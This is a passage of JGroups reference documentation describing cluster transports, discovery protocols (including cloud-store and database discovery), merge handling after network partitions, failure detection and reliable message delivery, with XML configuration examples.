name,\n e.g. +match-interface:eth.\\*+\n\nmatch-address:: Pick an address which matches a pattern against the host address,\n e.g. +match-address:192.168.\\*+\n\nmatch-host:: Pick an address which matches a pattern against the host name,\n e.g. +match-host:linux.\\*+\n \nAn example of setting the bind address in UDP to use a site local address is:\n \n[source,xml]\n----\n<UDP bind_addr=\"SITE_LOCAL\" \/>\n----\n\nThis will pick any address of any interface that's site-local, e.g. a +192.168.x.x+ or\n+10.x.x.x+ address.\n \n\n[[UDP]]\n==== UDP\n\nUDP uses IP multicast for sending messages to all members of a group and UDP datagrams for unicast\nmessages (sent to a single member). When started, it opens a unicast and multicast socket: the unicast\nsocket is used to send\/receive unicast messages, whereas the multicast socket sends and receives multicast\nmessages. The channel's physical address will be the address and port number of the unicast socket.\n \nA protocol stack with UDP as transport protocol is typically used with clusters whose members run\nin the same subnet. If running across subnets, an admin has to ensure that\nIP multicast is enabled across subnets. It is often the case that IP multicast is not enabled across\nsubnets. In such cases, the stack has to either use UDP without IP multicasting or other transports\nsuch as TCP.\n \n\n${UDP}\n\n\n[[TCP]]\n==== TCP\n\nSpecifying TCP in your protocol stack tells JGroups to use TCP to send messages between cluster members.\nInstead of using a multicast bus, the cluster members create a mesh of TCP connections.\n \nFor example, while UDP sends 1 IP multicast packet when sending a message to a cluster of 10 members,\nTCP needs to send the message 9 times. It sends the same message to the first member, to the second\nmember, and so on (excluding itself as the message is looped back internally).\n\nThis is slow, as the cost of sending a group message is O(n) with TCP, where it is O(1) with UDP. As the\ncost of sending a group message with TCP is a function of the cluster size, it becomes higher with\nlarger clusters.\n \n\nNOTE: We recommend to use UDP for larger clusters, whenever possible\n\n\n${BasicTCP}\n\n${TCP}\n\n\n[[TCP_NIO2]]\n==== TCP_NIO2\n\nTCP_NIO2 is similar to <<TCP>>, but uses NIO (= Non blocking IO) to send messages to and receive messages\nfrom members. Contrary to TCP, it doesn't use 1 thread per connection, but handles accepts, connects, reads and\nwrites in a *single thread*.\n\nAll of these operations are guaranteed to never block.\n\nFor example, if a read is supposed to receive 1000 bytes and only reveived 700, the read reads the 700 bytes, saves\nthem somewhere and later - when the remaining 300 bytes have been received - is notified to complete the read\nand then returns the 1000 bytes to the application.\n\nUsing a single thread is not a problem, as operations will never block. The only potentially blocking operation,\nnamely delivering messages up to the application, is done via the regular or OOB thread pools, as usual.\n\nWhile <<TCP>> and <<TCP_NIO2>> both have the N-1 problem of sending cluster wide messages (contrary to <<UDP>>),\nTCP_NIO2 is able to handle a larger number of connections than TCP, as it doesn't use the thread-per-connection model,\nand - contrary to TCP, but similar to UDP - it doesn't block when sending or receiving messages.\n\n${BasicTCP}\n\n${TCP_NIO2}\n\n\n[[TUNNEL]]\n\n\n==== TUNNEL\nTUNNEL is described in <<TUNNEL_Advanced>>.\n \n\n${TUNNEL}\n\n\n[[DiscoveryProtocols]]\n=== Initial membership discovery\n\nThe task of the discovery is to find an initial membership, which is used to determine the current\ncoordinator. Once a coordinator is found, the joiner sends a JOIN request to the coord.\n\nDiscovery is also called periodically by `MERGE2` (see <<MERGE2>>), to see if we have\ndiverging cluster membership information.\n \n\n[[Discovery]]\n==== Discovery\n\n`Discovery` is the superclass for all discovery protocols and therefore its\nproperties below can be used in any subclass.\n\nDiscovery sends a discovery request, and waits for +$$num_initial_members$$+ discovery\nresponses, or +timeout+ ms, whichever occurs first, before returning. Note that\n+$$break_on_coord_rsp=\"true\"$$+ will return as soon as we have a response from a coordinator.\n \n\n${Discovery}\n\n[[DiscoveryAndCaches]]\n===== Discovery and local caches\n\nBesides finding the current coordinator in order to send a JOIN request to it, discovery also\nfetches information about members and adds it to its local caches. This information includes\nthe logical name, UUID and IP address\/port of each member. When discovery responses are received,\nthe information in it will be added to the local caches.\n \n\nSince 3.5 it is possible to define this information in a single file, with each line providing\ninformation about one member. The file contents look like this:\n\n\n----\nm1.1 1 10.240.78.26:7800 T\nm2.1 2 10.240.122.252:7800 F\nm3.1 3 10.240.199.15:7800 F\n----\n\nThis file defines information about 3 members m1.1, m2.1 and m3.1. The first element (\"m1.1\") is the\nlogical name. Next comes the UUID (1), followed by the IP address and port (`10.240.78.26:7800`).\nT means that the member is the current coordinator.\n \nMethods `dumpCache()` can be used to write the current contents of any member to a file (in the above\nformat) and `addToCache()` can be used to add the contents of a file to any member. These operations\ncan for example be invoked via JMX or probe.sh.\n \nRefer to the section on `FILE_PING` for more information on how to use these files to speed up\nthe discovery process.\n \n\n[[PING]]\n==== PING\n\nInitial (dirty) discovery of members. Used to detect the coordinator (oldest member), by\nmcasting PING requests to an IP multicast address.\n \nEach member responds with a packet {C, A}, where C=coordinator's address and A=own address. After N\nmilliseconds or M replies, the joiner determines the coordinator from the responses, and sends a\nJOIN request to it (handled by GMS). If nobody responds, we assume we are the first member of a group.\n \nUnlike TCPPING, PING employs dynamic discovery, meaning that the member does not have to know in advance\nwhere other cluster members are.\n \nPING uses the IP multicasting capabilities of the transport to send a discovery\nrequest to the cluster. It therefore requires UDP as transport.\n \n\n${PING}\n\n\n[[TCPPING_Prot]]\n==== TCPPING\n\nTCPPING is used with TCP as transport, and uses a static list of cluster members's addresses. See\n<<TCPPING>> for details.\n \n\n${TCPPING}\n\nNOTE: It is recommended to include the addresses of _all_ cluster members in `initial_hosts`.\n \n\n\n[[TCPGOSSIP_Prot]]\n==== TCPGOSSIP\n\nTCPGOSSIP uses an external GossipRouter to discover the members of a cluster. See <<TCPGOSSIP>>\nfor details.\n \n\n${TCPGOSSIP}\n\n[[MPING]]\n==== MPING\n\nMPING (=Multicast PING) uses IP multicast to discover the initial membership. It can be used with all\ntransports, but usually is used in combination with TCP. TCP usually requires TCPPING, which has to list\nall cluster members explicitly, but MPING doesn't have this requirement. The typical use case for this\nis when we want TCP as transport, but multicasting for discovery so we don't have to define a static\nlist of initial hosts in TCPPING\n \nMPING uses its own multicast socket for discovery. Properties +$$bind_addr$$+ (can also\nbe set via ++$$-Djgroups.bind_addr=$$++), +$$mcast_addr$$+ and\n+$$mcast_port$$+ can be used to configure it.\n \nNote that MPING requires a separate thread listening on the multicast socket for discovery requests.\n \n\n${MPING}\n\n[[FILE_PING]]\n==== FILE_PING\n\nFILE_PING can be used instead of GossipRouter in cases where no external process is desired.\n \n\nSince 3.5, the way FILE_PING performs discovery has changed. The following paragraphs describe the new\nmechanism to discover members via FILE_PING or subclasses (e.g. S3_PING or GOOGLE_PING),\nso this applies to all cloud-based stores as well.\n \nInstead of storing 1 file per member in the file system or cloud store, we only store 1 file for\n_all_ members. This has the advantage, especially in cloud stores, that the number\nof reads is not a function of the cluster size, e.g. we don't have to perform 1000 reads for member\ndiscovery in a 1000 node cluster, but just a single read. This is important as the cost of\n1000 times the round trip time of a (REST) call to the cloud store is certainly higher that the cost\nof a single call. There may also be a charge for calls to the cloud, so a reduced number of calls lead\nto reduced charges for cloud store access, especially in large clusters.\n\n\nThe current coordinator is always in charge of writing the file; participants never write it, but only\nread it. When there is a split and we have multiple coordinator, we may also have multiple files.\n \n\nThe name of a file is always UUID.logical_name.list, e.g. `0000-0000-000000000001.m1.1.list`, which has\na UUID of 1, a logical name of \"m1.1\" and the suffix \".list\".\n \n\n[[BootstrapConfiguration]]\n===== Configuration with a preconfigured bootstrap file\n\nTo speed up the discovery process when starting a large cluster, a predefined bootstrap file\ncan be used. Every node then needs to have an entry in the file and its UUID and IP address:port\nneeds to be the same as in the file. For example, when using the following bootstrap file:\n\n\n----\nm1.1 1 10.240.78.26:7800 T\nm2.1 2 10.240.122.252:7800 F\nm3.1 3 10.240.199.15:7800 F\n----\n\n, the member called \"m1.1\" needs to have a UUID of 1, and needs to run on host 10.240.78.26 on\nport 7800. The UUID can be injected via an AddressGenerator (see UPerf for an example).\n \nWhen a member starts, it loads the bootstrap file, which contains information about all other members,\nand thus (ideally) never needs to run a discovery process. In the above example, the new joiner also\nknows that the current coordinator (marked with a 'T') is m1.1, so it can send its JOIN request to\nthat node.\n \nWhen the coordinator changes, or members not listed in the file join, the current coordinator\nwrites the file again, so all members have access to the updated information when needed.\n\nIf a bootstrap discovery file is to be used, it needs to be placed into the file system or cloud\nstore in the correct location and with the right name (see the Discovery section for naming details).\n\nThe design is discussed in more detail in\nlink:$$https:\/\/github.com\/belaban\/JGroups\/blob\/master\/doc\/design\/CloudBasedDiscovery.txt$$[CloudBasedDiscovery.txt]\n\n\n===== Removal of zombie files\n\nBy default, a new coordinator C never removes a file created by an old coordinator `A`. E.g. in `{A,B,C,D}` (with\ncoordinator `A`), if `C` becomes coordinator on a split `{A,B} | {C,D}`, then `C` doesn't remove `A`'s file, as there\nis no way for `C` to know whether `A` crashed or whether `A` was partitioned away.\n\nEvery coordinator `P` installs a shutdown hook which removes `P`'s file on termination. However, this doesn't apply\nto a process killed ungracefully, e.g. by `kill -9`. In this case, no shutdown hook will get called. If we had view\n`{A,B,C}`, and `A` was killed via kill -9, and `B` takes over, we'd have files `A.list` and `B.list`.\n\nTo change this, attribute `remove_old_coords_on_view_change` can be set to true. In this case, files created by old\ncoordinators will be removed. In the scenario above, where `A` crashed, `B` would remove `A.list`.\n\nHowever, if we have a split between `{A,B}` and `{C,D}`, `C` would remove `A.list`. To prevent this, every coordinator\nwrites its file again on a view change that has left members or in which the coordinator changed.\n\nThere is still a case which can end up with a zombie file that's never removed: when we have a single member `A` and\nit is killed via `kill -9`. In this case, file `A.list` will never get cleaned up and subsequent joiners will ask\n`A` to join, up to `GMS.max_join_attempts` times.\n\nZombie cleanup can be solved by setting `remove_all_files_on_view_change` to true. In this case, a coordinator\nremoves _all files_ on a view change that has members leaving or changes the coordinator.\n\nNOTE: Setting `remove_old_coords_on_view_change` or `remove_all_files_on_view_change` to true generates more traffic\nto the file system or cloud store. If members are always shut down gracefully, or never killed via `kill -9`, then\nit is recommended to set both attributes to false.\n\n\n${FILE_PING}\n\n\n\n==== JDBC_PING\n\nJDBC_PING uses a DB to store information about cluster nodes used for discovery. All cluster nodes are supposed to be\nable to access the same DB.\n\nWhen a node starts, it queries information about existing members from the database, determines the coordinator and\nthen asks the coord to join the cluster. It also inserts information about itself into the table, so others can\nsubsequently find it.\n\nWhen a node P has crashed, the current coordinator removes P's information from the DB. However, if there is a network\nsplit, then this can be problematic, as crashed members cannot be told from partitioned-away members.\n\nFor instance, if we have `{A,B,C,D}`, and the split creates 2 subclusters `{A,B}` and `{C,D}`,\nthen `A` would remove `{C,D}` because it thinks they crashed, and - likewise - `C` would remove `{A,B}`.\n\nTo solve this, every member re-inserts its information into the DB after a _view change_. So when `C` and `D`'s view\nchanges from `{A,B,C,D}` to `{C,D}`, both sides of the split re-insert their information.\nDitto for the other side of the network split.\n\nThe re-insertion is governed by attributes `info_writer_max_writes_after_view` and `info_writer_sleep_time`: the former\ndefines the number of times re-insertion should be done (in a timer task) after each view change and the latter is the\nsleep time (in ms) between re-insertions.\n\nThe value of this is that dead members are removed from the DB (because they cannot do re-insertion), but network splits\nare handled, too.\n\nAnother attribute `clear_table_on_view_change` governs how zombies are handled. Zombies are table entries for members\nwhich crashed, but weren't removed for some reason. E.g. if we have a single member `A` and kill it (via kill -9), then\nit won't get removed from the table.\n\nIf `clear_table_on_view_change` is set to true, then the coordinator _clears_ the table after a view change (instead of\nonly removing the crashed members), and everybody re-inserts its own information. This attribute can be set to true if\nautomatic removal of zombies is desired. However, it is costly, therefore if no zombies ever occur (e.g. because processes\nare never killed with kill -9), or zombies are removed by a system admin, then it should be set to false.\n\nNOTE: Processes killed with kill -3 are removed from the DB as a shutdown handler will be called on kill -3\n(but not on kill -9).\n \n\n${JDBC_PING}\n\n\n\n==== BPING\n\nBPING uses UDP broadcasts to discover other nodes. The default broadcast address (dest) is\n 255.255.255.255, and should be replaced with a subnet specific broadcast, e.g. 192.168.1.255.\n \n\n${BPING}\n\n\n\n==== RACKSPACE_PING\n\nRACKSPACE_PING uses Rackspace Cloud Files Storage to discover initial members. Each node writes a small\n object in a shared Rackspace container. New joiners read all addresses from the container and ping each\n of the elements of the resulting set of members. When a member leaves, it deletes its corresponding object.\n \n\nThis objects are stored under a container called 'jgroups', and each node will write an object name after\n the cluster name, plus a \"\/\" followed by the address, thus simulating a hierarchical structure.\n \n\n${RACKSPACE_PING}\n\n\n\n==== S3_PING\n\nS3_PING uses Amazon S3 to discover initial members. New joiners read all addresses\nfrom this bucket and ping each of the elements of the resulting set of members. When a member leaves, it\ndeletes its corresponding file.\n \n\nIt's designed specifically for members running on Amazon EC2, where multicast traffic is not allowed and\nthus MPING or PING will not work. When Amazon RDS is preferred over S3, or if a shared database is used,\nan alternative is to use JDBC_PING.\n \n\nEach instance uploads a small file to an S3 bucket and each instance reads the files out of this bucket\nto determine the other members.\n \n\nThere are three different ways to use S3_PING, each having its own tradeoffs between security and\nease-of-use. These are described in more detail below:\n\n* Private buckets, Amazon AWS credentials given to each instance\n* Public readable and writable buckets, no credentials given to each instance\n* Public readable but private writable buckets, pre-signed URLs given to each instance\n Pre-signed URLs are the most secure method since writing to buckets still requires authorization and\n you don't have to pass Amazon AWS credentials to every instance. However, they are also the most complex\n to setup.\n \n\nHere's a configuration example for private buckets with credentials given to each instance:\n \n\n\n[source,xml]\n----\n\n<S3_PING location=\"my_bucket\" access_key=\"access_key\"\n secret_access_key=\"secret_access_key\" timeout=\"2000\"\n num_initial_members=\"3\"\/>\n \n----\n\nHere's an example for public buckets with no credentials:\n \n\n\n[source,xml]\n----\n\n<S3_PING location=\"my_bucket\"\n timeout=\"2000\" num_initial_members=\"3\"\/>\n \n----\n\nAnd finally, here's an example for public readable buckets with pre-signed URLs:\n \n\n\n[source,xml]\n----\n\n<S3_PING pre_signed_put_url=\"http:\/\/s3.amazonaws.com\/my_bucket\/DemoCluster\/node1?AWSAccessKeyId=access_key&Expires=1316276200&Signature=it1cUUtgCT9ZJyCJDj2xTAcRTFg%3D\"\n pre_signed_delete_url=\"http:\/\/s3.amazonaws.com\/my_bucket\/DemoCluster\/node1?AWSAccessKeyId=access_key&Expires=1316276200&Signature=u4IFPRq%2FL6%2FAohykIW4QrKjR23g%3D\"\n timeout=\"2000\" num_initial_members=\"3\"\/>\n \n----\n\n${S3_PING}\n\n\n\n==== AWS_PING\n\nThis is a protocol written by Meltmedia, which uses the AWS API. It is not part of JGroups, but can be\ndownloaded at link:$$http:\/\/meltmedia.github.io\/jgroups-aws\/$$[].\n\n\n==== Native S3 PING\n\nThis implementation by Zalando uses the AWS SDK. It is not part of JGroups, but can be found at\nlink:$$https:\/\/github.com\/zalando\/jgroups-native-s3-ping\/$$[].\n\n\n\n==== GOOGLE_PING\n\nGOOGLE_PING is a subclass of S3_PING and inherits most of the functionality. It uses Google Cloud\n Storage to store information about individual members.\n \n\nThe snippet below shows a sample config:\n \n\n\n[source,xml]\n----\n\n<GOOGLE_PING\n location=\"jgroups-bucket\"\n access_key=\"GXXXXXX\"\n secret_access_key=\"YYYYYY\"\n timeout=\"2000\" num_initial_members=\"3\"\/>\n \n----\n\nThis will use a bucket \"jgroups-bucket\" or create one if it doesn't exist, then create another folder\n under it with the cluster name, and finally use 1 object per member in that location for member info.\n \n\n${GOOGLE_PING}\n\n\n\n==== SWIFT_PING\n\nSWIFT_PING uses Openstack Swift to discover initial members. Each node writes a small\n object in a shared container. New joiners read all addresses from the container and ping each\n of the elements of the resulting set of members. When a member leaves, it deletes its corresponding object.\n \n\nThese objects are stored under a container called 'jgroups' (by default), and each node will write an object name after\n the cluster name, plus a \"\/\" followed by the address, thus simulating a hierarchical structure.\n \n\nCurrently only Openstack Keystone authentication is supported. Here is a sample configuration block:\n \n\n\n[source,xml]\n----\n\n<SWIFT_PING timeout=\"2000\"\n num_initial_members=\"3\"\n auth_type=\"keystone_v_2_0\"\n auth_url=\"http:\/\/localhost:5000\/v2.0\/tokens\"\n username=\"demo\"\n password=\"password\"\n tenant=\"demo\" \/>\n \n----\n\n${SWIFT_PING}\n\n\n\n\n\n==== PDC - Persistent Discovery Cache\n\nThe Persistent Discovery Cache can be used to cache the results of the discovery process persistently.\nE.g. if we have TCPPING.initial_hosts configured to include only members A and B, but have a lot more\nmembers, then other members can bootstrap themselves and find the right coordinator even when neither\nA nor B are running.\n \n\nAn example of a TCP-based stack configuration is:\n \n\n\n[source,xml]\n----\n\n<TCP \/>\n<PDC cache_dir=\"\/tmp\/jgroups\" \/>\n<TCPPING timeout=\"2000\" num_initial_members=\"20\"\n initial_hosts=\"192.168.1.5[7000]\" port_range=\"0\"\n return_entire_cache=\"true\"\n use_disk_cache=\"true\" \/>\n \n----\n\n${PDC}\n\n\n\n=== Merging after a network partition\n\n[[MERGE2]]\n==== MERGE2\n\nIf a cluster gets split for some reasons (e.g. network partition), this protocol merges the subclusters\nback into one cluster. It is only run by the coordinator (the oldest member in a cluster), which\nperiodically multicasts its presence and view information. If another coordinator (for the same cluster)\nreceives this message, it will initiate a merge process. Note that this merges subgroups\n+{A,B}+ and +{C,D,E}+ back into +{A,B,C,D,E}+,\nbut it does _not merge state_. The application has to handle the callback to merge\nstate. See <<HandlingNetworkPartitions>> for suggestion on merging states.\n\nFollowing a merge, the coordinator of the merged group can shift from the typical case of\n\"the coordinator is the member who has been up the longest.\" During the merge process, the coordinators\nof the various subgroups need to reach a common decision as to who the new coordinator is.\nIn order to ensure a consistent result, each coordinator combines the addresses of all the members\nin a list and then sorts the list. The first member in the sorted list becomes the coordinator.\nThe sort order is determined by how the address implements the interface. Then JGroups compares based\non the UUID. So, take a hypothetical case where two machines were running, with one machine running\nthree separate cluster members and the other two members. If communication between the machines were cut,\nthe following subgroups would form:\n+{A,B} and {C,D,E}+\nFollowing the merge, the new view would be: +{C,D,A,B,E}+, with C being the new\ncoordinator.\n \n\nNote that \"A\", \"B\" and so on are just logical names, attached to UUIDs, but the actual sorting is done\n on the actual UUIDs.\n \n${MERGE2}\n\nNOTE: `MERGE2` is deprecated and will be removed in 4.0. Users of it should switch to `MERGE3`.\n\n\n\n[[MERGE3]]\n==== MERGE3\n\nIf a cluster gets split for some reasons (e.g. network partition), this protocol merges the subclusters\nback into one cluster.\n\nAll members periodically send an INFO message with their address (UUID), logical name,\nphysical address and ViewId. The ViewId (<<ViewId>>) is used to see if we have diverging\nviews among the cluster members: periodically, every coordinator looks at the INFO messages received so\nfar and checks if there are any inconsistencies.\n\nIf inconsistencies are found, the _merge leader_ will be the member with the lowest address (UUID).\n\nThe merge leader then asks the senders of the inconsistent ViewIds for their full views. Once received,\nit simply passes a `MERGE` event up the stack, where the merge will be handled (by `GMS`) in exactly the same\nway as if `MERGE2` has generated the `MERGE` event.\n\nThe advantages of `MERGE3` compared to `MERGE2` are:\n\n* Sending of INFO messages is spread out over time, preventing message peaks which might cause\n packet loss. This is especially important in large clusters.\n* Only 1 merge should be running at any time. Competing merges, as happening with `MERGE2`, slow\n down the merge process, and don't scale to large clusters.\n* An INFO message carries the logical name and physical address of a member. Compared to `MERGE2`,\n this allows us to immediately send messages to newly merged members, and not have to solicit\n this information first.\n* On the downside, `MERGE3` has constant (small) traffic by all members.\n* `MERGE3` was written for an IP multicast capable transport (`UDP`), but it also works with other\n transports (such as `TCP`), although it isn't as efficient on `TCP` as on `UDP`.\n\n\n===== Example\n\n[source,xml]\n----\n<MERGE3 max_interval=\"10000\" min_interval=\"5000\" check_interval=\"15000\"\/>\n----\n\nThis means that every member sends out an INFO message at a random interval in range [5000 .. 10000] ms. Every\n15 seconds (`check_interval`), every coordinator checks if it received a ViewId differing from its own, and initiates\na merge if true.\n\n* We have subclusters `{A,B,C}`, `{D,E}` and `{F}`. The subcluster coordinators are `A`, `D` and `F`\n* The network partition now heals\n* `D` checks its received ViewIds, and sees entries from itself and `A`\n** Since broadcasting of INFO messages is unreliable (as `MERGE3` is underneath `NAKACK2` in the stack), the last\n INFO message from `F` might have been dropped\n* `D` or `A` initiates a merge, which results in view `{A,B,C,D,E}`\n* A bit later, on the next check, `F` sees that its ViewId diverges from the ViewId sent in an INFO message by `C`\n* `F` and `A` initiate a new merge which results in merge view `{A,B,C,D,E,F}`\n\nIncreasing `check_interval` decreases the chance of partial merges (as shown above), but doesn't entirely eliminate them:\nmembers are not started at exactly the same time, and therefore their check intervals overlap.\nIf a member's interval elapsed just after receiving INFO messages from a subset of the subclusters\n(e.g. briefly after a partition healed), then we will still have a partial merge.\n\n${MERGE3}\n\n\n\n\n\n\n[[FailureDetection]]\n=== Failure Detection\n\nThe task of failure detection is to probe members of a group and see whether they are alive. When a member is\nsuspected of having failed, then a SUSPECT message is sent to all nodes of the cluster. It is not the task of the\nfailure detection layer to exclude a crashed member (this is done by the group membership protocol, GMS), but\nsimply to notify everyone that a node in the cluster is suspected of having crashed.\n\nThe SUSPECT message is handled by the GMS protocol of the current coordinator only; all other members ignore it.\n \n\n[[FD]]\n==== FD\n\nFailure detection based on a logical ring and heartbeat messages.\n\nMembers form a logical ring; e.g. in view `{A,B,C,D}`, `A` pings `B`, which pings `C`, which pings `D`, which pings `A`.\n'Pinging' means sending a heartbeat.\n\nEach member sends this heartbeat every `timeout` ms to the neighbor to its right. When a member receives a heartbeat, it\nsends back an ack. When the ack is received the timestamp of when a member last heard from its neighbor is reset.\n\nWhen a member doesn't receive any heartbeat acks from its neighbor for `timeout` * `max_tries` ms,\nthat member is declared suspected, and will be excluded by GMS.\n\nThis is done by `FD` multicasting a `SUSPECT(P)` message which is handled by the current coordinator by double-checking\nthe health of `P` (using `VERIFY_SUSPECT`) and - if `P` still doesn't reply - by excluding `P` from the membership.\n\nNote that setting `msg_counts_as_heartbeat` in `P` to true causes the timestamp of `P` in the pinging member to be\nreset.\n\n===== Example\n\n[source,xml]\n----\n<FD timeout=\"3000\" max_tries=\"4\" \/>\n----\n* The membership is `{A,B,C,D,E}`.\n* Now C and D crash at the same time\n* B's next heartbeats won't get an ack\n* After roughly 12 seconds (4 * 3 secs), B suspects C\n** B now starts sending heartbeats to D\n* A (the coordinator) handles the `SUSPECT(C)` message from B and uses `VERIFY_SUSPECT` to double-check that C is really dead\n* After `VERIFY_SUSPECT.timeout` ms, A creates a new view `{A,B,D,E}` excluding C\n* After ca. 12 seconds, B sends a `SUSPECT(D)` message to the coordinator, which eventually also excludes `D`\n\n\n\n${FD}\n\n\n\n[[FD_ALL]]\n==== FD_ALL\n\nFailure detection based on simple heartbeat protocol. Every member periodically multicasts a heartbeat.\nEvery member also maintains a table of all members (minus itself). When data or a heartbeat from P are\nreceived, we reset the timestamp for P to the current time.\nPeriodically, we check for expired members whose timestamp is greater than the timeout, and suspect those.\n\n===== Example\n\n[source,xml]\n----\n<FD_ALL timeout=\"12000\" interval=\"3000\" timeout_check_interval=\"2000\"\/>\n----\n* The membership is `{A,B,C,D,E}`.\n* Every member broadcasts a heartbeat every 3 seconds. When received, the sender's timestamp in the table\n is set to the current time\n* Every member also checks every 2 seconds if any member's timestamp exceeds the timeout and suspects\n that member if this is the case\n* Now C and D crash at the same time\n* After roughly 12-13 seconds, `A` broadcasts a `SUSPECT(C,D)` message\n* The coordinator (`A`) uses `VERIFY_SUSPECT` to double check if `C` and `D` are dead\n* `A` creates a new view `{A,B,E}` which excludes `C` and `D`\n\nNOTE: Contrary to `FD` which suspects adjacent crashed members `C` and `D` one by one, `FD_ALL` suspects `C` and `D` in\nconstant time. `FD` takes `N` * (`timeout` * `max_tries`) ms, whereas `FD_ALL` takes `timeout` ms\n\n${FD_ALL}\n\n\n\n[[FD_ALL2]]\n==== FD_ALL2\n\nSimilar to `FD_ALL`, but doesn't use any timestamps. Instead, a boolean flag is associated with each\nmember. When a message or heartbeat (sent every `interval` ms) from P is received, P's flag is set to true.\nThe heartbeat checker checks every `timeout` ms for members whose flag is false, suspects those, and\n- when done - resets all flags to false again.\nThe times it takes to suspect a member are the same as for `FD_ALL`\n \n\n${FD_ALL2}\n\n\n\n[[FD_SOCK]]\n==== FD_SOCK\n\nFailure detection protocol based on a ring of TCP sockets created between cluster members, similar to `FD` but\nnot using heartbeat messages.\n\nEach member in a cluster connects to its neighbor (the last member connects to the first), thus forming a ring.\nMember `B` is suspected when its neighbor `A` detects abnormal closing of its TCP socket\n(presumably due to a crash of `B`). However, if `B` is about to leave gracefully, it lets its neighbor `A`\nknow, so that `A` doesn't suspect `B`.\n \n===== Example\n* The membership is `{A,B,C,D,E}`.\n* Members `C` and `D` are killed at the same time\n* `B` notices that `C` abnormally closed its TCP socket and broadcasts a `SUSPECT(C)` message\n* The current coordinator (`A`) asks `VERIFY_SUSPECT` to double check that `C` is dead\n* Meanwhile, `B` tries to create a TCP socket to the next-in-line (`D`) but fails. It therefore broadcasts a\n `SUSPECT(D)` message\n* `A` also handles this message and asks `VERIFY_SUSPECT` to double check if `D` is dead\n* After `VERIFY_SUSPECT` can't verify that `C` and `D` are still alive, `A` creates a new view\n `{A,B,E}` and installs it\n* The time taken for `FD_SOCK` to suspect a member is very small (a few ms)\n\nNOTE: It is recommended to use `FD_SOCK` and `FD` or `FD_ALL` together in the same stack: `FD_SOCK` detects killed\nnodes immediately, and `FD_ALL` (with a higher timeout) detects hung members or kernel panics \/ crashed switches\n(which don't close the TCP connection) after the timeout.\n \n\n${FD_SOCK}\n\n\n[[FD_HOST]]\n==== FD_HOST\n\nTo detect the crash or freeze of entire hosts and all of the cluster members running on them, `FD_HOST`\ncan be used. It is not meant to be used in isolation, as it doesn't detect crashed members on the\nlocal host, but in conjunction with other failure detection protocols, such as `FD_ALL` or `FD_SOCK`.\n\n`FD_HOST` can be used when we have multiple cluster members running on a physical box. For example,\nif we have members `{A,B,C,D}` running on host 1 and `{M,N,O,P}` running on host 2, and host 1 is\npowered down, then `A`, `B`, `C` and `D` are suspected and removed from the cluster together, typically\nin one view change.\n\nBy default, `FD_HOST` uses `InetAddress.isReachable()` to perform liveness checking of other hosts, but\nif property `cmd` is set, then any script or command can be used. `FD_HOST` will launch the command and\npass the IP address ot the host to be checked as argument. Example: `cmd=\"ping -c 3\"`.\n\nA typical failure detection configuration would look like this:\n\n[source,xml]\n----\n...\n<FD_SOCK\/>\n<FD_ALL timeout=\"60000\" interval=\"20000\"\/>\n<FD_HOST interval=\"10000\" timeout=\"35000\" \/>\n...\n----\n\nIf we have members `{A,B,C}` on host `192.168.1.3`, `{M,N,O}` on `192.168.1.4` and `{X,Y,Z}` on `192.168.1.5`, then\nthe behavior is as follows:\n\n.Failure detection behavior\n[options=\"header\"]\n|===============\n|Scenario|Behavior\n|Any member (say `O`) crashes|\n `FD_SOCK` detects this immediately (as the TCP socket was closed). `O` is suspected and\n removed\n \n|Member `Y` hangs|\n `FD_ALL` starts missing heartbeats from `Y` (note that host `192.168.1.5` is up) and suspects\n `Y` after 60 seconds. `Y` is removed from the view.\n \n|Host `192.168.1.3` is shutdown (`shutdown -h now`)|\n Since this is a graceful shutdown, the OS closes all sockets. `FD_SOCK` therefore\n suspects `A`, `B` and `C` and removes them from the view immediately.\n \n|The power supply to host `192.168.1.3` is cut, or `192.168.1.3` panicked|\n `FD_HOST` detects that `192.168.1.3` is not alive and suspects `A`, `B` and `C` after ~35 to 45s.\n \n|Member `N` leaves|\n Since this is a graceful leave, none of the failure detection protocols kick in\n \n\n|===============\n\n\n${FD_HOST}\n\n\n\n==== VERIFY_SUSPECT\n\nVerifies that a suspected member is really dead by pinging that member one last time before excluding it,\n and dropping the suspect message if the member does respond.\n \n\nVERIFY_SUSPECT tries to minimize false suspicions.\n \n\nThe protocol works as follows: it catches SUSPECT events traveling up the stack.\n Then it verifies that the suspected member is really dead. If yes, it passes the SUSPECT event up the\n stack, otherwise it discards it. VERIFY_SUSPECT Has to be placed somewhere above the failure detection\n protocol and below the GMS protocol (receiver of the SUSPECT event). Note that SUSPECT events may be\n reordered by this protocol.\n \n\n${VERIFY_SUSPECT}\n\n\n\n[[ReliableMessageTransmission]]\n\n\n=== Reliable message transmission\n\n[[NAKACK]]\n\n\n==== pbcast.NAKACK\n\nNAKACK provides reliable delivery and FIFO (= First In First Out) properties for messages sent to all\n nodes in a cluster.\n \n\nReliable delivery means that no message sent by a sender will ever be lost, as all messages are\nnumbered with sequence numbers (by sender) and retransmission requests are sent to the sender of\na message if that sequence number is not received.\n\nNOTE: Note that NAKACK can also be configured to send retransmission requests for M to _anyone_ in the cluster,\n rather than only to the sender of M.\n\n\nFIFO order means that all messages from a given sender are received in exactly the order in which\n they were sent.\n \n\nNAKACK is a Lossless and FIFO delivery of multicast messages, using negative acks. E.g. when\n receiving P:1, P:3, P:4, a receiver delivers only P:1, and asks P for retransmission of message 2,\n queuing P3-4. When P2 is finally received, the receiver will deliver P2-4 to the application.\n \n\n${NAKACK}\n\n[[NAKACK2]]\n\n\n==== NAKACK2\n\nNAKACK2 was introduced in 3.1 and is a successor to NAKACK (at some point it will replace NAKACK). It\n has the same properties as NAKACK, but its implementation is faster and uses less memory, plus it\n creates fewer tasks in the timer.\n \n\nSome of the properties of NAKACK were deprecated in NAKACK2, but were not removed so people can simply\n change from NAKACK to NAKACK2 by changing the protocol name in the config.\n \n\n${NAKACK2}\n\n[[UNICAST]]\n\n\n==== UNICAST\n\nUNICAST provides reliable delivery and FIFO (= First In First Out) properties for point-to-point\n messages between one sender and one receiver.\n \n\nReliable delivery means that no message sent by a sender will ever be lost, as all messages are\n numbered with sequence numbers (by sender) and retransmission requests are sent to the sender of\n a message if that sequence number is not received.\n \n\nFIFO order means that all messages from a given sender are received in exactly the order in which\n they were sent.\n \n\nUNICAST uses _positive acks_ for retransmission; sender A keeps sending\n message M until receiver B delivers M and sends an ack(M) to A, or until B leaves the cluster or A\n crashes.\n \n\nAlthough JGroups attempts to send acks selectively, UNICAST will still see a lot of acks on the wire.\n If this is not desired, use UNICAST2 (see <<UNICAST2>>).\n \n\nOn top of a reliable transport, such as TCP, UNICAST is not really needed. 